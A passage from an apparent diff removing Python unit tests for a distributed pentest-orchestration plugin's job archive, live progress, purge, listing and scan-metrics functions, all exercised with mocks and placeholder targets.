self.assertEqual(archive_dict["passes"][2]["pass_nr"], 3) - stub = plugin.chainstore_hset.call_args[1]["value"] - self.assertEqual(stub["pass_count"], 3) - self.assertEqual(stub["job_status"], "STOPPED") - - -class TestPhase5Endpoints(unittest.TestCase): - """Phase 5: API Endpoints.""" - - @classmethod - def _mock_plugin_modules(cls): - if 'extensions.business.cybersec.red_mesh.pentester_api_01' in sys.modules: - return - TestPhase1ConfigCID._mock_plugin_modules() - - def _get_plugin_class(self): - self._mock_plugin_modules() - from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin - return PentesterApi01Plugin - - def _build_finalized_stub(self, job_id="test-job"): - """Build a CStoreJobFinalized-shaped dict.""" - return { - "job_id": job_id, - "job_status": "FINALIZED", - "target": "example.com", - "task_name": "Test", - "risk_score": 42, - "run_mode": "SINGLEPASS", - "duration": 200.0, - "pass_count": 1, - "launcher": "launcher-node", - "launcher_alias": "launcher-alias", - "worker_count": 2, - "start_port": 1, - "end_port": 1024, - "date_created": 1000000.0, - "date_completed": 1000200.0, - "job_cid": "QmArchiveCID", - "job_config_cid": "QmConfigCID", - } - - def _build_running_job(self, job_id="run-job", pass_count=8): - """Build a running job dict with N pass_reports.""" - pass_reports = [ - {"pass_nr": i, "report_cid": f"QmPass{i}", "risk_score": 10 + i} - for i in range(1, pass_count + 1) - ] - return { - "job_id": job_id, - "job_status": "RUNNING", - "job_pass": pass_count, - "run_mode": "CONTINUOUS_MONITORING", - "launcher": "launcher-node", - "launcher_alias": "launcher-alias", - "target": "example.com", - "task_name": "Continuous Test", - "start_port": 1, - "end_port": 1024, - "date_created": 1000000.0, - "risk_score": 18, - "job_config_cid": "QmConfigCID", - "workers": { - "worker-A": {"start_port": 1, "end_port": 512, "finished": False}, - "worker-B": {"start_port": 513, "end_port": 1024, "finished": False}, - }, - "timeline": [ - {"type": "created", "label": "Created", "date": 1000000.0, "actor": "launcher", "actor_type": "system", "meta": {}}, - {"type": "started", "label": "Started", "date": 1000001.0, "actor": "launcher", "actor_type": "system", "meta": {}}, - ], - "pass_reports": pass_reports, - } - - def _build_plugin(self, jobs_dict): - """Build a mock plugin with given jobs in CStore.""" - Plugin = self._get_plugin_class() - plugin = MagicMock() - plugin.ee_addr = "launcher-node" - plugin.ee_id = "launcher-alias" - plugin.cfg_instance_id = "test-instance" - plugin.r1fs = MagicMock() - - plugin.chainstore_hgetall.return_value = dict(jobs_dict) - plugin.chainstore_hget.side_effect = lambda hkey, key: jobs_dict.get(key) - plugin._normalize_job_record = MagicMock( - side_effect=lambda k, v: (k, v) if isinstance(v, dict) and v.get("job_id") else (None, None) - ) - - # Bind real methods so endpoint logic executes properly - plugin._get_all_network_jobs = lambda: Plugin._get_all_network_jobs(plugin) - plugin._get_job_from_cstore = lambda job_id: Plugin._get_job_from_cstore(plugin, job_id) - return plugin - - def test_get_job_archive_finalized(self): - """get_job_archive for finalized job returns archive with matching job_id.""" - Plugin = self._get_plugin_class() - stub = self._build_finalized_stub("fin-job") - plugin = self._build_plugin({"fin-job": stub}) - - archive_data = {"job_id": "fin-job", "passes": [], "ui_aggregate": {}} - plugin.r1fs.get_json.return_value = archive_data - - result = Plugin.get_job_archive(plugin, job_id="fin-job") - self.assertEqual(result["job_id"], "fin-job") - self.assertEqual(result["archive"]["job_id"], "fin-job") - - def test_get_job_archive_running(self): - """get_job_archive for running job returns not_available error.""" - Plugin = self._get_plugin_class() - running = self._build_running_job("run-job", pass_count=2) - plugin = self._build_plugin({"run-job": running}) - - result = Plugin.get_job_archive(plugin, job_id="run-job") - self.assertEqual(result["error"], "not_available") - - def test_get_job_archive_integrity_mismatch(self): - """Corrupted job_cid pointing to wrong archive is rejected.""" - Plugin = self._get_plugin_class() - stub = self._build_finalized_stub("fin-job") - plugin = self._build_plugin({"fin-job": stub}) - - # Archive has a different job_id - plugin.r1fs.get_json.return_value = {"job_id": "other-job", "passes": []} - - result = Plugin.get_job_archive(plugin, job_id="fin-job") - self.assertEqual(result["error"], "integrity_mismatch") - - def test_get_job_data_running_last_5(self): - """Running job with 8 passes returns last 5 refs only.""" - Plugin = self._get_plugin_class() - running = self._build_running_job("run-job", pass_count=8) - plugin = self._build_plugin({"run-job": running}) - - result = Plugin.get_job_data(plugin, job_id="run-job") - self.assertTrue(result["found"]) - refs = result["job"]["pass_reports"] - self.assertEqual(len(refs), 5) - # Should be the last 5 (pass_nr 4-8) - self.assertEqual(refs[0]["pass_nr"], 4) - self.assertEqual(refs[-1]["pass_nr"], 8) - - def test_get_job_data_finalized_returns_stub(self): - """Finalized job returns stub as-is with job_cid.""" - Plugin = self._get_plugin_class() - stub = self._build_finalized_stub("fin-job") - plugin = self._build_plugin({"fin-job": stub}) - - result = Plugin.get_job_data(plugin, job_id="fin-job") - self.assertTrue(result["found"]) - self.assertEqual(result["job"]["job_cid"], "QmArchiveCID") - self.assertEqual(result["job"]["pass_count"], 1) - - def test_list_jobs_finalized_as_is(self): - """Finalized stubs returned unmodified with all CStoreJobFinalized fields.""" - Plugin = self._get_plugin_class() - stub = self._build_finalized_stub("fin-job") - plugin = self._build_plugin({"fin-job": stub}) - - result = Plugin.list_network_jobs(plugin) - self.assertIn("fin-job", result) - job = result["fin-job"] - self.assertEqual(job["job_cid"], "QmArchiveCID") - self.assertEqual(job["pass_count"], 1) - self.assertEqual(job["worker_count"], 2) - self.assertEqual(job["risk_score"], 42) - self.assertEqual(job["duration"], 200.0) - - def test_list_jobs_running_stripped(self): - """Running jobs have counts but no timeline, workers, or pass_reports.""" - Plugin = self._get_plugin_class() - running = self._build_running_job("run-job", pass_count=3) - plugin = self._build_plugin({"run-job": running}) - - result = Plugin.list_network_jobs(plugin) - self.assertIn("run-job", result) - job = result["run-job"] - # Should have counts - self.assertEqual(job["pass_count"], 3) - self.assertEqual(job["worker_count"], 2) - # Should NOT have heavy fields - self.assertNotIn("timeline", job) - self.assertNotIn("workers", job) - self.assertNotIn("pass_reports", job) - - def test_get_job_archive_not_found(self): - """get_job_archive for non-existent job returns not_found.""" - Plugin = self._get_plugin_class() - plugin = self._build_plugin({}) - - result = Plugin.get_job_archive(plugin, job_id="missing-job") - self.assertEqual(result["error"], "not_found") - - def test_get_job_archive_r1fs_failure(self): - """get_job_archive when R1FS fails returns fetch_failed.""" - Plugin = self._get_plugin_class() - stub = self._build_finalized_stub("fin-job") - plugin = self._build_plugin({"fin-job": stub}) - plugin.r1fs.get_json.return_value = None - - result = Plugin.get_job_archive(plugin, job_id="fin-job") - self.assertEqual(result["error"], "fetch_failed") - - -class TestPhase12LiveProgress(unittest.TestCase): - """Phase 12: Live Worker Progress.""" - - @classmethod - def _mock_plugin_modules(cls): - if 'extensions.business.cybersec.red_mesh.pentester_api_01' in sys.modules: - return - TestPhase1ConfigCID._mock_plugin_modules() - - def _get_plugin_class(self): - self._mock_plugin_modules() - from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin - return PentesterApi01Plugin - - def test_worker_progress_model_roundtrip(self): - """WorkerProgress.from_dict(wp.to_dict()) preserves all fields.""" - from extensions.business.cybersec.red_mesh.models import WorkerProgress - wp = WorkerProgress( - job_id="job-1", - worker_addr="0xWorkerA", - pass_nr=2, - progress=45.5, - phase="service_probes", - ports_scanned=500, - ports_total=1024, - open_ports_found=[22, 80, 443], - completed_tests=["fingerprint_completed", "service_info_completed"], - updated_at=1700000000.0, - live_metrics={"total_duration": 30.5}, - ) - d = wp.to_dict() - wp2 = WorkerProgress.from_dict(d) - self.assertEqual(wp2.job_id, "job-1") - self.assertEqual(wp2.worker_addr, "0xWorkerA") - self.assertEqual(wp2.pass_nr, 2) - self.assertAlmostEqual(wp2.progress, 45.5) - self.assertEqual(wp2.phase, "service_probes") - self.assertEqual(wp2.ports_scanned, 500) - self.assertEqual(wp2.ports_total, 1024) - self.assertEqual(wp2.open_ports_found, [22, 80, 443]) - self.assertEqual(wp2.completed_tests, ["fingerprint_completed", "service_info_completed"]) - self.assertEqual(wp2.updated_at, 1700000000.0) - self.assertEqual(wp2.live_metrics, {"total_duration": 30.5}) - - def test_get_job_progress_filters_by_job(self): - """get_job_progress returns only workers for the requested job.""" - Plugin = self._get_plugin_class() - plugin = MagicMock() - plugin.cfg_instance_id = "test-instance" - - # Simulate two jobs' progress in the :live hset - live_data = { - "job-A:worker-1": {"job_id": "job-A", "progress": 50}, - "job-A:worker-2": {"job_id": "job-A", "progress": 75}, - "job-B:worker-3": {"job_id": "job-B", "progress": 30}, - } - plugin.chainstore_hgetall.return_value = live_data - - result = Plugin.get_job_progress(plugin, job_id="job-A") - self.assertEqual(result["job_id"], "job-A") - self.assertEqual(len(result["workers"]), 2) - self.assertIn("worker-1", result["workers"]) - self.assertIn("worker-2", result["workers"]) - self.assertNotIn("worker-3", result["workers"]) - - def test_get_job_progress_empty(self): - """get_job_progress for non-existent job returns empty workers dict.""" - Plugin = self._get_plugin_class() - plugin = MagicMock() - plugin.cfg_instance_id = "test-instance" - plugin.chainstore_hgetall.return_value = {} - - result = Plugin.get_job_progress(plugin, job_id="nonexistent") - self.assertEqual(result["job_id"], "nonexistent") - self.assertEqual(result["workers"], {}) - - def test_publish_live_progress(self): - """_publish_live_progress writes stage-based progress to CStore :live hset.""" - Plugin = self._get_plugin_class() - plugin = MagicMock() - plugin.cfg_instance_id = "test-instance" - plugin.ee_addr = "node-A" - plugin._last_progress_publish = 0 - plugin.time.return_value = 100.0 - - # Mock a local worker with state (port scan partial + fingerprint done) - worker = MagicMock() - worker.state = { - "ports_scanned": list(range(100)), - "open_ports": [22, 80], - "completed_tests": ["fingerprint_completed"], - "done": False, - } - worker.initial_ports = list(range(1, 513)) - - plugin.scan_jobs = {"job-1": {"worker-thread-1": worker}} - - # Mock CStore lookup for pass_nr - plugin.chainstore_hget.return_value = {"job_pass": 3} - - Plugin._publish_live_progress(plugin) - - # Verify hset was called with correct key pattern - plugin.chainstore_hset.assert_called_once() - call_args = plugin.chainstore_hset.call_args - self.assertEqual(call_args.kwargs["hkey"], "test-instance:live") - self.assertEqual(call_args.kwargs["key"], "job-1:node-A") - progress_data = call_args.kwargs["value"] - self.assertEqual(progress_data["job_id"], "job-1") - self.assertEqual(progress_data["worker_addr"], "node-A") - self.assertEqual(progress_data["pass_nr"], 3) - self.assertEqual(progress_data["phase"], "service_probes") - self.assertEqual(progress_data["ports_scanned"], 100) - self.assertEqual(progress_data["ports_total"], 512) - self.assertIn(22, progress_data["open_ports_found"]) - self.assertIn(80, progress_data["open_ports_found"]) - # Stage-based progress: service_probes = stage 3 (idx 2), so 2/5*100 = 40% - self.assertEqual(progress_data["progress"], 40.0) - # Single thread — no threads field - self.assertNotIn("threads", progress_data) - - def test_publish_live_progress_multi_thread_phase(self): - """Phase is the earliest active phase; per-thread data is included.""" - Plugin = self._get_plugin_class() - plugin = MagicMock() - plugin.cfg_instance_id = "test-instance" - plugin.ee_addr = "node-A" - plugin._last_progress_publish = 0 - plugin.time.return_value = 100.0 - - # Thread 1: fully done - worker1 = MagicMock() - worker1.state = { - "ports_scanned": list(range(256)), - "open_ports": [22], - "completed_tests": ["fingerprint_completed", "service_info_completed", "web_tests_completed", "correlation_completed"], - "done": True, - } - worker1.initial_ports = list(range(1, 257)) - - # Thread 2: still on port scan (50 of 256 ports) - worker2 = MagicMock() - worker2.state = { - "ports_scanned": list(range(50)), - "open_ports": [], - "completed_tests": [], - "done": False, - } - worker2.initial_ports = list(range(257, 513)) - - plugin.scan_jobs = {"job-1": {"t1": worker1, "t2": worker2}} - plugin.chainstore_hget.return_value = {"job_pass": 1} - - Plugin._publish_live_progress(plugin) - - call_args = plugin.chainstore_hset.call_args - progress_data = call_args.kwargs["value"] - # Phase should be port_scan (earliest across threads), not done - self.assertEqual(progress_data["phase"], "port_scan") - # Stage-based: port_scan (idx 0) + sub-progress (306/512 * 20%) = ~12% - self.assertGreater(progress_data["progress"], 10) - self.assertLess(progress_data["progress"], 15) - # Per-thread data should be present (2 threads) - self.assertIn("threads", progress_data) - self.assertEqual(progress_data["threads"]["t1"]["phase"], "done") - self.assertEqual(progress_data["threads"]["t2"]["phase"], "port_scan") - self.assertEqual(progress_data["threads"]["t2"]["ports_scanned"], 50) - self.assertEqual(progress_data["threads"]["t2"]["ports_total"], 256) - - def test_clear_live_progress(self): - """_clear_live_progress deletes progress keys for all workers.""" - Plugin = self._get_plugin_class() - plugin = MagicMock() - plugin.cfg_instance_id = "test-instance" - - Plugin._clear_live_progress(plugin, "job-1", ["worker-A", "worker-B"]) - - self.assertEqual(plugin.chainstore_hset.call_count, 2) - calls = plugin.chainstore_hset.call_args_list - keys_deleted = {c.kwargs["key"] for c in calls} - self.assertEqual(keys_deleted, {"job-1:worker-A", "job-1:worker-B"}) - for c in calls: - self.assertIsNone(c.kwargs["value"]) - - -class TestPhase14Purge(unittest.TestCase): - """Phase 14: Job Deletion & Purge.""" - - @classmethod - def _mock_plugin_modules(cls): - if 'extensions.business.cybersec.red_mesh.pentester_api_01' in sys.modules: - return - TestPhase1ConfigCID._mock_plugin_modules() - - def _get_plugin_class(self): - self._mock_plugin_modules() - from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin - return PentesterApi01Plugin - - def _make_plugin(self): - plugin = MagicMock() - plugin.cfg_instance_id = "test-instance" - plugin.ee_addr = "node-A" - return plugin - - def test_purge_finalized_collects_all_cids(self): - """Finalized purge collects archive + config + aggregated_report + worker report CIDs.""" - Plugin = self._get_plugin_class() - plugin = self._make_plugin() - - # CStore stub for a finalized job - job_specs = { - "job_id": "job-1", - "job_status": "FINALIZED", - "job_cid": "cid-archive", - "job_config_cid": "cid-config", - } - plugin.chainstore_hget.return_value = job_specs - - # Archive contains nested CIDs - archive = { - "passes": [ - { - "aggregated_report_cid": "cid-agg-1", - "worker_reports": { - "worker-A": {"report_cid": "cid-wr-A"}, - "worker-B": {"report_cid": "cid-wr-B"}, - }, - }, - ], - } - plugin.r1fs.get_json.return_value = archive - plugin.r1fs.delete_file.return_value = True - plugin.chainstore_hgetall.return_value = {} - - # Normalize returns the specs as-is - plugin._normalize_job_record = MagicMock(return_value=("job-1", job_specs)) - - result = Plugin.purge_job(plugin, "job-1") - self.assertEqual(result["status"], "success") - - # Verify all 5 CIDs were deleted - deleted_cids = {c.args[0] for c in plugin.r1fs.delete_file.call_args_list} - self.assertEqual(deleted_cids, {"cid-archive", "cid-config", "cid-agg-1", "cid-wr-A", "cid-wr-B"}) - self.assertEqual(result["cids_deleted"], 5) - self.assertEqual(result["cids_total"], 5) - - def test_purge_finalized_no_pass_report_cids(self): - """Finalized purge does NOT try to delete individual pass report CIDs (they are inside archive).""" - Plugin = self._get_plugin_class() - plugin = self._make_plugin() - - job_specs = { - "job_id": "job-1", - "job_status": "FINALIZED", - "job_cid": "cid-archive", - # No pass_reports key — finalized stubs don't have them - } - plugin.chainstore_hget.return_value = job_specs - plugin.r1fs.get_json.return_value = {"passes": []} - plugin.r1fs.delete_file.return_value = True - plugin.chainstore_hgetall.return_value = {} - plugin._normalize_job_record = MagicMock(return_value=("job-1", job_specs)) - - result = Plugin.purge_job(plugin, "job-1") - self.assertEqual(result["status"], "success") - - # Only archive CID should be deleted (no pass_reports, no config, no workers) - deleted_cids = {c.args[0] for c in plugin.r1fs.delete_file.call_args_list} - self.assertEqual(deleted_cids, {"cid-archive"}) - - def test_purge_running_collects_all_cids(self): - """Stopped (was running) purge collects config + worker CIDs + pass report CIDs + nested CIDs.""" - Plugin = self._get_plugin_class() - plugin = self._make_plugin() - - job_specs = { - "job_id": "job-1", - "job_status": "STOPPED", - "job_config_cid": "cid-config", - "workers": { - "node-A": {"finished": True, "canceled": True, "report_cid": "cid-wr-A"}, - }, - "pass_reports": [ - {"report_cid": "cid-pass-1"}, - ], - } - plugin.chainstore_hget.return_value = job_specs - - # Pass report contains nested CIDs - pass_report = { - "aggregated_report_cid": "cid-agg-1", - "worker_reports": { - "node-A": {"report_cid": "cid-pass-wr-A"}, - }, - } - plugin.r1fs.get_json.return_value = pass_report - plugin.r1fs.delete_file.return_value = True - plugin.chainstore_hgetall.return_value = {} - plugin._normalize_job_record = MagicMock(return_value=("job-1", job_specs)) - - result = Plugin.purge_job(plugin, "job-1") - self.assertEqual(result["status"], "success") - - deleted_cids = {c.args[0] for c in plugin.r1fs.delete_file.call_args_list} - self.assertEqual(deleted_cids, {"cid-config", "cid-wr-A", "cid-pass-1", "cid-agg-1", "cid-pass-wr-A"}) - - def test_purge_r1fs_failure_keeps_cstore(self): - """Partial R1FS failure leaves CStore intact and returns 'partial' status.""" - Plugin = self._get_plugin_class() - plugin = self._make_plugin() - - job_specs = { - "job_id": "job-1", - "job_status": "FINALIZED", - "job_cid": "cid-archive", - "job_config_cid": "cid-config", - } - plugin.chainstore_hget.return_value = job_specs - plugin.r1fs.get_json.return_value = {"passes": []} - - # First CID deletes ok, second raises - plugin.r1fs.delete_file.side_effect = [True, Exception("disk error")] - - plugin._normalize_job_record = MagicMock(return_value=("job-1", job_specs)) - - result = Plugin.purge_job(plugin, "job-1") - self.assertEqual(result["status"], "partial") - self.assertEqual(result["cids_deleted"], 1) - self.assertEqual(result["cids_failed"], 1) - self.assertEqual(result["cids_total"], 2) - - # CStore should NOT be tombstoned - tombstone_calls = [ - c for c in plugin.chainstore_hset.call_args_list - if c.kwargs.get("hkey") == "test-instance" and c.kwargs.get("value") is None - ] - self.assertEqual(len(tombstone_calls), 0) - - def test_purge_cleans_live_progress(self): - """Purge deletes live progress keys for the job from :live hset.""" - Plugin = self._get_plugin_class() - plugin = self._make_plugin() - - job_specs = { - "job_id": "job-1", - "job_status": "STOPPED", - "workers": {"node-A": {"finished": True}}, - } - plugin.chainstore_hget.return_value = job_specs - plugin.r1fs.delete_file.return_value = True - - # Live hset has keys for this job and another - plugin.chainstore_hgetall.return_value = { - "job-1:node-A": {"progress": 100}, - "job-1:node-B": {"progress": 50}, - "job-2:node-C": {"progress": 30}, - } - plugin._normalize_job_record = MagicMock(return_value=("job-1", job_specs)) - - result = Plugin.purge_job(plugin, "job-1") - self.assertEqual(result["status"], "success") - - # Check that live progress keys for job-1 were deleted - live_delete_calls = [ - c for c in plugin.chainstore_hset.call_args_list - if c.kwargs.get("hkey") == "test-instance:live" and c.kwargs.get("value") is None - ] - deleted_keys = {c.kwargs["key"] for c in live_delete_calls} - self.assertEqual(deleted_keys, {"job-1:node-A", "job-1:node-B"}) - # job-2 key should NOT be touched - self.assertNotIn("job-2:node-C", deleted_keys) - - def test_purge_success_tombstones_cstore(self): - """After all CIDs deleted, CStore key is tombstoned (set to None).""" - Plugin = self._get_plugin_class() - plugin = self._make_plugin() - - job_specs = { - "job_id": "job-1", - "job_status": "FINALIZED", - "job_cid": "cid-archive", - } - plugin.chainstore_hget.return_value = job_specs - plugin.r1fs.get_json.return_value = {"passes": []} - plugin.r1fs.delete_file.return_value = True - plugin.chainstore_hgetall.return_value = {} - plugin._normalize_job_record = MagicMock(return_value=("job-1", job_specs)) - - result = Plugin.purge_job(plugin, "job-1") - self.assertEqual(result["status"], "success") - - # CStore tombstone: hset(hkey=instance_id, key=job_id, value=None) - tombstone_calls = [ - c for c in plugin.chainstore_hset.call_args_list - if c.kwargs.get("hkey") == "test-instance" - and c.kwargs.get("key") == "job-1" - and c.kwargs.get("value") is None - ] - self.assertEqual(len(tombstone_calls), 1) - - def test_stop_and_delete_delegates_to_purge(self): - """stop_and_delete_job marks job stopped then delegates to purge_job.""" - Plugin = self._get_plugin_class() - plugin = self._make_plugin() - plugin.scan_jobs = {} - - job_specs = { - "job_id": "job-1", - "job_status": "RUNNING", - "workers": {"node-A": {"finished": False}}, - } - plugin.chainstore_hget.return_value = job_specs - plugin._normalize_job_record = MagicMock(return_value=("job-1", job_specs)) - - # Mock purge_job to verify delegation - purge_result = {"status": "success", "job_id": "job-1", "cids_deleted": 3, "cids_total": 3} - plugin.purge_job = MagicMock(return_value=purge_result) - - result = Plugin.stop_and_delete_job(plugin, "job-1") - - # Verify job was marked stopped before purge - hset_calls = [ - c for c in plugin.chainstore_hset.call_args_list - if c.kwargs.get("hkey") == "test-instance" and c.kwargs.get("key") == "job-1" - ] - self.assertEqual(len(hset_calls), 1) - saved_specs = hset_calls[0].kwargs["value"] - self.assertEqual(saved_specs["job_status"], "STOPPED") - self.assertTrue(saved_specs["workers"]["node-A"]["finished"]) - self.assertTrue(saved_specs["workers"]["node-A"]["canceled"]) - - # Verify purge was called - plugin.purge_job.assert_called_once_with("job-1") - self.assertEqual(result, purge_result) - - -class TestPhase15Listing(unittest.TestCase): - """Phase 15: Listing Endpoint Optimization.""" - - @classmethod - def _mock_plugin_modules(cls): - if 'extensions.business.cybersec.red_mesh.pentester_api_01' in sys.modules: - return - TestPhase1ConfigCID._mock_plugin_modules() - - def _get_plugin_class(self): - self._mock_plugin_modules() - from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin - return PentesterApi01Plugin - - def test_list_finalized_returns_stub_fields(self): - """Finalized jobs return exact CStoreJobFinalized fields.""" - Plugin = self._get_plugin_class() - plugin = MagicMock() - plugin.cfg_instance_id = "test-instance" - - finalized_stub = { - "job_id": "job-1", - "job_status": "FINALIZED", - "target": "10.0.0.1", - "task_name": "scan-1", - "risk_score": 75, - "run_mode": "SINGLEPASS", - "duration": 120.5, - "pass_count": 1, - "launcher": "0xLauncher", - "launcher_alias": "node1", - "worker_count": 2, - "start_port": 1, - "end_port": 1024, - "date_created": 1700000000.0, - "date_completed": 1700000120.0, - "job_cid": "QmArchive123", - "job_config_cid": "QmConfig456", - } - plugin.chainstore_hgetall.return_value = {"job-1": finalized_stub} - plugin._normalize_job_record = MagicMock(return_value=("job-1", finalized_stub)) - - result = Plugin.list_network_jobs(plugin) - self.assertIn("job-1", result) - entry = result["job-1"] - - # All CStoreJobFinalized fields present - self.assertEqual(entry["job_id"], "job-1") - self.assertEqual(entry["job_status"], "FINALIZED") - self.assertEqual(entry["job_cid"], "QmArchive123") - self.assertEqual(entry["job_config_cid"], "QmConfig456") - self.assertEqual(entry["target"], "10.0.0.1") - self.assertEqual(entry["risk_score"], 75) - self.assertEqual(entry["duration"], 120.5) - self.assertEqual(entry["pass_count"], 1) - self.assertEqual(entry["worker_count"], 2) - - def test_list_running_stripped(self): - """Running jobs have listing fields but no heavy data.""" - Plugin = self._get_plugin_class() - plugin = MagicMock() - plugin.cfg_instance_id = "test-instance" - - running_spec = { - "job_id": "job-2", - "job_status": "RUNNING", - "target": "10.0.0.2", - "task_name": "scan-2", - "risk_score": 0, - "run_mode": "CONTINUOUS_MONITORING", - "start_port": 1, - "end_port": 65535, - "date_created": 1700000000.0, - "launcher": "0xLauncher", - "launcher_alias": "node1", - "job_pass": 3, - "job_config_cid": "QmConfig789", - "workers": { - "addr-A": {"start_port": 1, "end_port": 32767, "finished": False, "report_cid": "QmBigReport1"}, - "addr-B": {"start_port": 32768, "end_port": 65535, "finished": False, "report_cid": "QmBigReport2"}, - }, - "timeline": [ - {"event": "created", "ts": 1700000000.0}, - {"event": "started", "ts": 1700000001.0}, - ], - "pass_reports": [ - {"pass_nr": 1, "report_cid": "QmPass1"}, - {"pass_nr": 2, "report_cid": "QmPass2"}, - ], - "redmesh_job_start_attestation": {"big": "blob"}, - } - plugin.chainstore_hgetall.return_value = {"job-2": running_spec} - plugin._normalize_job_record = MagicMock(return_value=("job-2", running_spec)) - - result = Plugin.list_network_jobs(plugin) - self.assertIn("job-2", result) - entry = result["job-2"] - - # Listing essentials present - self.assertEqual(entry["job_id"], "job-2") - self.assertEqual(entry["job_status"], "RUNNING") - self.assertEqual(entry["target"], "10.0.0.2") - self.assertEqual(entry["task_name"], "scan-2") - self.assertEqual(entry["run_mode"], "CONTINUOUS_MONITORING") - self.assertEqual(entry["job_pass"], 3) - self.assertEqual(entry["worker_count"], 2) - self.assertEqual(entry["pass_count"], 2) - - # Heavy fields stripped - self.assertNotIn("workers", entry) - self.assertNotIn("timeline", entry) - self.assertNotIn("pass_reports", entry) - self.assertNotIn("redmesh_job_start_attestation", entry) - self.assertNotIn("job_config_cid", entry) - self.assertNotIn("report_cid", entry) - - -class TestPhase16ScanMetrics(unittest.TestCase): - """Phase 16: Scan Metrics Collection.""" - - def test_metrics_collector_empty_build(self): - """build() with zero data returns ScanMetrics with defaults, no crash.""" - from extensions.business.cybersec.red_mesh.pentest_worker import MetricsCollector - mc = MetricsCollector() - result = mc.build() - d = result.to_dict() - self.assertEqual(d.get("total_duration", 0), 0) - self.assertEqual(d.get("rate_limiting_detected", False), False) - self.assertEqual(d.get("blocking_detected", False), False) - # No crash, sparse output - self.assertNotIn("connection_outcomes", d) - self.assertNotIn("response_times", d) - - def test_metrics_collector_records_connections(self): - """After recording outcomes, connection_outcomes has correct counts.""" - from extensions.business.cybersec.red_mesh.pentest_worker import MetricsCollector - mc = MetricsCollector() - mc.start_scan(100) - mc.record_connection("connected", 0.05) - mc.record_connection("connected", 0.03) - mc.record_connection("timeout", 1.0) - mc.record_connection("refused", 0.01) - d = mc.build().to_dict() - outcomes = d["connection_outcomes"] - self.assertEqual(outcomes["connected"], 2) - self.assertEqual(outcomes["timeout"], 1) - self.assertEqual(outcomes["refused"], 1) - self.assertEqual(outcomes["total"], 4) - # Response times computed - rt = d["response_times"] - self.assertIn("mean", rt) - self.assertIn("p95", rt) - self.assertEqual(rt["count"], 4) - - def test_metrics_collector_records_probes(self): - """After recording probes, probe_breakdown has entries.""" - from extensions.business.cybersec.red_mesh.pentest_worker import MetricsCollector - mc = MetricsCollector() - mc.start_scan(10) - mc.record_probe("_service_info_http", "completed") - mc.record_probe("_service_info_ssh", "completed") - mc.record_probe("_web_test_xss", "skipped:no_http") - d = mc.build().to_dict() - self.assertEqual(d["probes_attempted"], 3) - self.assertEqual(d["probes_completed"], 2) - self.assertEqual(d["probes_skipped"], 1) - self.assertEqual(d["probe_breakdown"]["_service_info_http"], "completed") - self.assertEqual(d["probe_breakdown"]["_web_test_xss"], "skipped:no_http") - - def test_metrics_collector_phase_durations(self): - """start/end phases produce positive durations.""" - import time - from extensions.business.cybersec.red_mesh.pentest_worker import MetricsCollector - mc = MetricsCollector() - mc.start_scan(10) - mc.phase_start("port_scan") - time.sleep(0.01) - mc.phase_end("port_scan") - d = mc.build().to_dict() - self.assertIn("phase_durations", d) - self.assertGreater(d["phase_durations"]["port_scan"], 0) - - def test_metrics_collector_findings(self): - """record_finding tracks severity distribution.""" - from extensions.business.cybersec.red_mesh.pentest_worker import MetricsCollector - mc = MetricsCollector() - mc.start_scan(10) - mc.record_finding("HIGH") - mc.record_finding("HIGH") - mc.record_finding("MEDIUM") - mc.record_finding("INFO") - d = mc.build().to_dict() - fd = d["finding_distribution"] - self.assertEqual(fd["HIGH"], 2) - self.assertEqual(fd["MEDIUM"], 1) - self.assertEqual(fd["INFO"], 1) - - def test_metrics_collector_coverage(self): - """Coverage tracks ports scanned vs in range.""" - from extensions.business.cybersec.red_mesh.pentest_worker import MetricsCollector - mc = MetricsCollector() - mc.start_scan(100) - for i in range(50): - mc.record_connection("connected" if i < 5 else "refused", 0.01) - # Simulate finding 5 open ports with banner confirmation - for i in range(5): - mc.record_open_port(8000 + i, protocol="http" if i < 3 else "ssh", banner_confirmed=(i < 3)) - d = mc.build().to_dict() - cov = d["coverage"] - self.assertEqual(cov["ports_in_range"], 100) - self.assertEqual(cov["ports_scanned"], 50) - self.assertEqual(cov["coverage_pct"], 50.0) - self.assertEqual(cov["open_ports_count"], 5) - # Open port details - self.assertEqual(len(d["open_port_details"]), 5) - self.assertEqual(d["open_port_details"][0]["port"], 8000) - self.assertEqual(d["open_port_details"][0]["protocol"], "http") - self.assertTrue(d["open_port_details"][0]["banner_confirmed"]) - self.assertFalse(d["open_port_details"][3]["banner_confirmed"]) - # Banner confirmation - self.assertEqual(d["banner_confirmation"]["confirmed"], 3) - self.assertEqual(d["banner_confirmation"]["guessed"], 2) - - def test_scan_metrics_model_roundtrip(self): - """ScanMetrics.from_dict(sm.to_dict()) preserves all fields.""" - from extensions.business.cybersec.red_mesh.models.shared import ScanMetrics - sm = ScanMetrics( - phase_durations={"port_scan": 10.5, "fingerprint": 3.2}, - total_duration=15.0, - connection_outcomes={"connected": 50, "timeout": 5, "total": 55}, - response_times={"min": 0.01, "max": 1.0, "mean": 0.1, "median": 0.08, "stddev": 0.05, "p95": 0.5, "p99": 0.9, "count": 55}, - rate_limiting_detected=True, - blocking_detected=False, - coverage={"ports_in_range": 1000, "ports_scanned": 1000, "ports_skipped": 0, "coverage_pct": 100.0}, - probes_attempted=5, - probes_completed=4, - probes_skipped=1, - probes_failed=0, - probe_breakdown={"_service_info_http": "completed"}, - finding_distribution={"HIGH": 3, "MEDIUM": 2}, - ) - d = sm.to_dict() - sm2 = ScanMetrics.from_dict(d) - self.assertEqual(sm2.to_dict(), d) - - def test_scan_metrics_strip_none(self): - """Empty/None fields stripped from serialization.""" - from extensions.business.cybersec.red_mesh.models.shared import ScanMetrics - sm = ScanMetrics() - d = sm.to_dict() - self.assertNotIn("phase_durations", d) - self.assertNotIn("connection_outcomes", d) - self.assertNotIn("response_times", d) - self.assertNotIn("slow_ports", d) - self.assertNotIn("probe_breakdown", d) - - def test_merge_worker_metrics(self): - """_merge_worker_metrics sums outcomes, coverage, findings; maxes duration; ORs flags.""" - TestPhase15Listing._mock_plugin_modules() - from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin - m1 = { - "connection_outcomes": {"connected": 30, "timeout": 5, "total": 35}, - "coverage": {"ports_in_range": 500, "ports_scanned": 500, "ports_skipped": 0, "coverage_pct": 100.0, "open_ports_count": 3}, - "finding_distribution": {"HIGH": 2, "MEDIUM": 